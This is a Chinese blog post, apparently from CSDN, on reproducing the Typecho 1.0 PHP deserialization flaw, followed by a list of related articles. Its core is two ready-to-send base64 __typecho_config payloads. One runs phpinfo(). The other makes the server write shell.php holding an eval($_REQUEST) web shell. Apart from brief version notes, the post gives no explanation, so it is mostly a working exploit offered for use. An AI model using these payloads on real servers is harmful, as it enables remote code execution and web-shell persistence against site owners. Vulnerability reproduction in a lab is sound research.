PHP序列化-Typecho框架漏洞-任意代码执行

最新推荐文章于 2024-04-22 09:54:58 发布
最新推荐文章于 2024-04-22 09:54:58 发布
阅读量517 收藏 1
点赞数
分类专栏: 漏洞学习 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119568562
版权

0x00 漏洞框架介绍

typecho框架存在反序列化漏洞,利用此漏洞可执行任意代码
php的版本一定要在5.4以上
Typecho版本一定是 1.0 (14.10.10)
高版本现在都修复了

0x01 漏洞复现

环境搭建

创建数据库–create database typecho;

创建数据库
漏洞点

Typecho框架漏洞-任意代码执行-----post-date

POC:显示phpinfo
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

EXP:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU4OiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywndycpLCc8Pz1AZXZhbCgkX1JFUVVFU1RbNzc3XSk/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTg6ImZwdXRzKGZvcGVuKCdzaGVsbC5waHAnLCd3JyksJzw/PUBldmFsKCRfUkVRVUVTVFs3NzddKT8+JykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9

告白热
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 596
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
typecho序列化漏洞
cxrpty的博客
03-02 729
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理。 实验环境:php5.4 实验步骤: 1.漏洞形成的原因 2.由于对finish参数、请求头HTTP_HOST及post_typecho_config数据进行验证,所以...
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
Typecho重大漏洞
qq_43676541的博客
04-15 338
#简介 Typecho是一个基于PHP的博客软件。Typecho是在GNU通用公共许可证2.0下发布的。 Typecho在1.1版本中存在反序列化漏洞,当系统未安装的情况下,攻击者可以利用ins
推荐开源项目:Typecho - 简约而强大的PHP博客系统
最新发布
gitblog_00003的博客
04-22 462
推荐开源项目:Typecho - 简约而强大的PHP博客系统 项目地址:https://gitcode.com/ennnnny/typecho Typecho 是一个基于PHP语言开发的轻量级博客平台,它的设计哲学是简约、高效,旨在为用户提供流畅的写作和阅读体验。无论你是技术爱好者还是普通博客作者,Typecho都能满足你的需求。 项目简介 Typecho 的核心亮点在于其简洁的后台管理和高度可定...
Typecho代码审计-反序列化漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 2337
本文以Typecho为靶场,通过代码审计,复现了反序列化漏洞
php cii订单导出,使用 kingcms.php 建立一个留言本【附模型代码
weixin_28754395的博客
03-21 277
1,进入后台管理 - 模型管理。2,建立新模型:留言本。信息填写如下图3,添加成功,返回模型列表,点刚刚添加的留言本模型,进入模型字段列表。4,添加新字段:姓名5,添加新字段:邮件6,需要的字段加好了,返回字段列表,把不需要显示的字段点成不显示,点相应的灯泡就可以了。7,模型建立好了,去栏目中心建立你的留言栏目吧8,建立好栏目,需要修改系统生成的留言模板,最简易的模板这样写:留言列表页模板 - t...
typecho_1.0_14.10.10_反序列化_漏洞
weixin_42786460的博客
09-10 221
typecho_1.0_14.10.10_反序列化_漏洞
漏洞复现】typecho_v1.0-14.10.10_unserialize
过期的秋刀鱼
11-05 507
下载链接:https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw。,上面base64编码后的结果就是该参数的值。漏洞利用脚本 phpinfo()信息。这个时候在网站的根目录下生成一个。得到base64编码后的结果。点击执行,返回 状态码。
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 463
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
castle-Typecho-Theme:Typecho Theme | MD 风格单栏主题
04-29
PHP 版本必须 >= 7.0 才能正常使用!前排提醒主题附带的插件目前存在无法获取 BiliBili 追番信息的问题,解决方案请参考在 0.9.6+ 已解决此问题。0.9.x 及以下的版本已经迁移到 0.9.x 分支后续 0.9.x 的更新均在 ...
Dynamics-typecho:Typecho 插件 - 我的动态
05-01
使用自定义在任意地方调用<?php $ dyn = Dynamics_Plugin :: get (); ?><?php while ( $ dyn -> dynamics -> next ()) : ?> < ul> < li> ================================================= </ li> ...
typecho-1.1-15.5.12-beta.zip
03-17
如果在反序列化过程中没有进行充分的输入验证和安全控制,攻击者可以构造特定的序列化数据,使得在反序列化时触发任意代码执行。 在Typecho 1.1至15.5.12 Beta版本中,此漏洞可能存在于用户输入数据的处理环节。...
PHP实例开发源码-typecho下载网站模板 php版.zip
11-21
这个压缩包提供了一个实际的PHP开发案例,适合学习者了解PHP在构建网站模板中的应用,以及如何与Typecho框架进行集成。 1. **PHP语言基础**:PHP是一种广泛用于Web开发的服务器端脚本语言,它嵌入到HTML代码中,...
Fresh-久别重逢-小清新-typecho扁平化自适应后台主题
03-23
Fresh主题采用了目前最盛行的bootstrap前端开发框架typecho停止深度适配;主题在继承typecho一向简单高效作风的同时让其愈加贴合现代年轻用户的审美。 自顺应+扁平化的设计理念再加上更具生机的配色,能让用户...
16-PHP代码审计——Typecho1.0.14反序列化漏洞
网络安全
05-26 1138
漏洞受影响版本: Typecho_v1.0.14以下 环境: php5以上 Typecho_v1.0.14.tar poc: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1O
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1955
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
记一次typecho序列化漏洞的复现(第一次写poc版)
m0_62100902的博客
06-28 1941
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
typecho序列化漏洞复现
weixin_71090536的博客
09-05 289
通俗解释如下代码为:call_user_func()函数 调用 assert() 函数,将 "phpinfo()" 这个参数给到 assert() 函数中,下方代码也可写为:assert("phpinfo()");3. 在访问 typecho_1.0(14.10.10)_unserialize_phpinfo.php 页面时,找到 base64 编码的字符串。call_user_func():回调函数,是危险函数,可利用其构造后门。cookie:__typecho_config=恶意代码字段。
docker-compose安装typecho
08-24
要在Docker中使用docker-compose安装Typecho,您可以按照以下步骤进行操作: 步骤1:创建一个新目录,并在其中创建一个名为`docker-compose.yml`的文件。 步骤2:在`docker-compose.yml`文件中添加以下内容: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值